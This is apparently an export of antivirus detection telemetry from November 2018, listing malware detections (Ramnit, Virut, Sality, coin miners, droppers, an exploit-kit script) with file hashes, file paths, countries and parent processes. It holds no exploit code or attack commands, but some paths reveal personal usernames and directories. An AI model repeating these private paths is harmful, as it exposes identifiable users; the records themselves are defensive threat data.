  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ\\หญิง ธิติกานต์ ชุดที่ 4 กุญแจชีวิต เข็มทิศหัวใจ.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='8153e8de9940ffac59c15913eeaeb2c711f597ca1d8a16051772995a82929764', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxsetup.exe', filepath='i:\\العاب\\الرجل الشجاع\\directx\\DXSETUP.EXE', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='8160e6db2b3438931c31b70e5f88087f6f62ca5aa33cbcb35f33586a3fb334b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:09:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\libgdxHTT\\52d76f2b\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='81c8c809d059ae0f1f1eafd80a6eea07173ffe18e4b309bb047bc69a535f285a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:06:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T07:49:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T13:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T12:59:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191345-496b06bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191345-496B06BF', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath='K:\\HBCD\\Programs\\USBWRITEPROTECTOR.EXE', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195136-ccf5baf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195136-CCF5BAF0', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:51:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cdbxp_setup_4.5.0.3717_x64.exe', filepath='\\\\?\\E:\\Stv\\cdbxp_setup_4.5.0.3717_x64.exe', filesize=5444000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='8346b1a405555f136366addd4f342d2be5c07bb5e203a2b0728ea4dd66392803', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:07:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fpupdate.exe', filepath='\\?\\J:\\Medal of honor\\FPUPDATE.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8364e39ef8eb8ecf08a16f34a0c8d0984a5bb2c19dcb611f257e962abc2a2dcf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xw4rin9kc4btv.exe', filepath='d:\\users\\X\\appdata\\local\\temp\\xw4rin9kc4btv.exe', filesize=60000, name='TR/Dropper.Gen.#M300.#R3439'), hash='83b324e78ea3838d0694b997312bdc9148aa8abf9e6dae9274f94ca70e4437a8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='83b4aa2e7a2bac23f3dca6ac64d8d28a81d3fce98b66743b8581627181f3b9e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\83B4AA2E7A2BAC23F3DCA6AC64D8D28A81D3FCE98B66743B8581627181F3B9E4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='83b4aa2e7a2bac23f3dca6ac64d8d28a81d3fce98b66743b8581627181f3b9e4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC E-GOVERNANCE SERVICES INDIA LIMITED\\DIGIPAY\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T08:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC e-Governance Services India Limited\\digipay\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:54:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC E-GOVERNANCE SERVICES INDIA LIMITED\\DIGIPAY\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-01T09:37:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='object --> last notification before commencing legal action4471.zip --> 2016inv-apr04203.pdf.js', filepath='object --> Last notification before commencing legal action4471.zip --> 2016INV-APR04203.pdf.js', filesize=16000, name='HTML/ExpKit.Gen2.#M3.#R20197'), hash='83bf4ffce3533fa893349f928adde6b6cc3b3ab0d62323015ab1d9dfc119f3a5', metadata=Row(cmdline=None, country='RU', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='object --> last notification before commencing legal action4471.zip --> 2016inv-apr04203.pdf.js', filepath='object --> Last notification before commencing legal action4471.zip --> 2016INV-APR04203.pdf.js', filesize=16000, name='HTML/ExpKit.Gen2.#M3.#R20197'), hash='83bf4ffce3533fa893349f928adde6b6cc3b3ab0d62323015ab1d9dfc119f3a5', metadata=Row(cmdline=None, country='RU', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:58:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='d:\\crazykart\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='f:\\new folder\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:34:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000a638', filepath='C:\\WINDOWS\\Temp\\133adec8-cf3f-4d03-a039-763dba312fa0\\tmp0000036d\\tmp0000a638', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='8460c459ddd42fe462f0da14f356f3ce609a5dfdcef29944cc0f39ff2a917462', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T16:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='84a768893c2a2629d9c0f1bf0b69b8e9fbc18870225c2449f2fc8cbb479717f0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='84c30cb4623e543677a61952a38e18b7a276d2e9768662c178919ac59aea5964', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T05:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\BTG-nVidia.miner.0.3.4b\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DwxSvuTmT06Qv2NJ.1', country='BN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:24:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110838-8ec47ea0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110748-853D8FC6\\AVSCAN-20181101-110838-8EC47EA0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215131-24478cb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-215115-2132098C\\AVSCAN-20181101-215131-24478CB9', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Media Network Sharing\\MsieXEc64.Exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Micro Miner\\MicroMiner.exe', parentsize=578048, timestamp='2018-11-01T15:34:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-041253-ae70e4ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0b231b2\\AVSCAN-20181101-041234-AB21E5DC\\AVSCAN-20181101-041253-AE70E4FF', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-000829-e4395641', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a693d56\\AVSCAN-20181101-000803-D50C3FD5\\AVSCAN-20181101-000829-E4395641', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:55:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-021833-de7aa536', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-021814-D9EB56DA\\AVSCAN-20181101-021833-DE7AA536', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111417-d0272f83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-111225-BAAB26DF\\AVSCAN-20181101-111417-D0272F83', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker_e28ce949.vir', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker_e28ce949.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Diebold\\Warsaw\\core.exe', parentsize=1083736, timestamp='2018-11-01T16:14:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Bakup gamer\\Mineradores\\BTG-nVidia.miner.0.3.4b\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4532304, timestamp='2018-11-01T04:03:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{52Z1M-JUPYB-MBTG4-BVLNA-YR15D-UCD9A}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6479136, timestamp='2018-11-01T11:12:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:19:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:44:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201455-a8dc8b05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201440-A5D6BE00\\AVSCAN-20181101-201455-A8DC8B05', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:14:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/autostart', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Google\\Drive\\googledrivesync.exe', parentsize=46281248, timestamp='2018-11-01T21:43:30Z'), dt=datetime.date(2018, 11, 1)),
